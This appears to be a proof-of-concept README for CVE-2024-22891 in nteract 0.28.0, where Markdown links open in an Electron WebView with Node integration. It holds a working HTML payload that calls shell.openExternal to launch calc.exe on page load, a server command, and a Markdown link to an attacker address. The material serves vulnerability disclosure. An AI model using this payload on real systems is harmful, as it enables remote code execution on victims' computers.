Related vulnerability
Title: Nteract security vulnerability (CVE-2024-22891)
Description: Nteract is an ecosystem, from the Nteract organization, made up of React components, JavaScript packages, and applications built on the Jupyter specification. Nteract v0.28.0 has a security vulnerability that stems from remote code execution (RCE) via Markdown links.
Description
PoC for CVE-2024-22891
Introduction
# Nteract PoC
A proof of concept for the CVE-2024-22891 vulnerability.
nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution.
In this repository there is an example vulnerable application and a proof-of-concept (PoC) exploit for it.
As a PoC there is a Python file that automates the process.
---------------------------------------
#### 1. Vulnerability Overview:
* Vulnerability Subject: Markdown link RCE
* Vulnerability Type: Other: Open Redirect
* Manifestation of the Issue: Electron Webview
* Affected Component: markdown
* Attack Type: Remote Code Execution
* Attack Vectors: To exploit the vulnerability, someone must click on the link or access the shared project's link.
* Reserved CVE Number: CVE-2024-22891
---------------------------------------
#### 2. Vulnerability Cause:
* nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution (because `nodeIntegration` in `webPreferences` is true).
* Exploit explanation:
* When a link is generated through Markdown within the application, nteract opens it in an Electron WebView, so the external page is loaded inside the application itself. Because that WebView has Node integration enabled, an attacker achieves Remote Code Execution (RCE) once the victim follows a link to the attacker's server.
Proof-of-concept (POC)
----------------------
**Step 1) The attacker hosts a page whose script launches calc.exe through Electron's shell.openExternal() function.**
```html
<html>
  <head>
    <title>jruru Link</title>
  </head>
  <body>
    <a id="jruruLink">jruru Link</a>
    <script>
      // Script function definition
      function openExternal() {
        try {
          const { shell } = require('electron');
          shell.openExternal('file:C:/Windows/System32/calc.exe');
        } catch (e) {
          alert('JRURU - External link cannot be opened.');
          console.error(e);
        }
      }
      // Automatically execute openExternal function after the page is loaded
      document.addEventListener('DOMContentLoaded', function () {
        openExternal();
      });
    </script>
  </body>
</html>
```
**Note:** If you want to test it quickly, start a server on the attacker's PC with the following command.
```shell
$ python -m http.server 80
```
**Step 2) Run the nteract application on the victim's system and create a Markdown link (or share the attacker's .ipynb file containing one as example code). Following the link executes calc.exe.**
```markdown
[Read This](http://[attacker_address]/shard_data.html)
```


---------------------------------------
#### 3. Additional Information
When a .ipynb file received through file sharing is executed, be cautious: the link may not be visible. The calc.exe here could have been any malicious payload, local or remote, which could have given the attacker full access to the victim's system.
File snapshot
```text
[4.0K] /data/pocs/fb659aefe2c77770c8ae06365603f86292ce5492
├── [ 694] jruru.html
└── [3.0K] README.md
0 directories, 2 files
```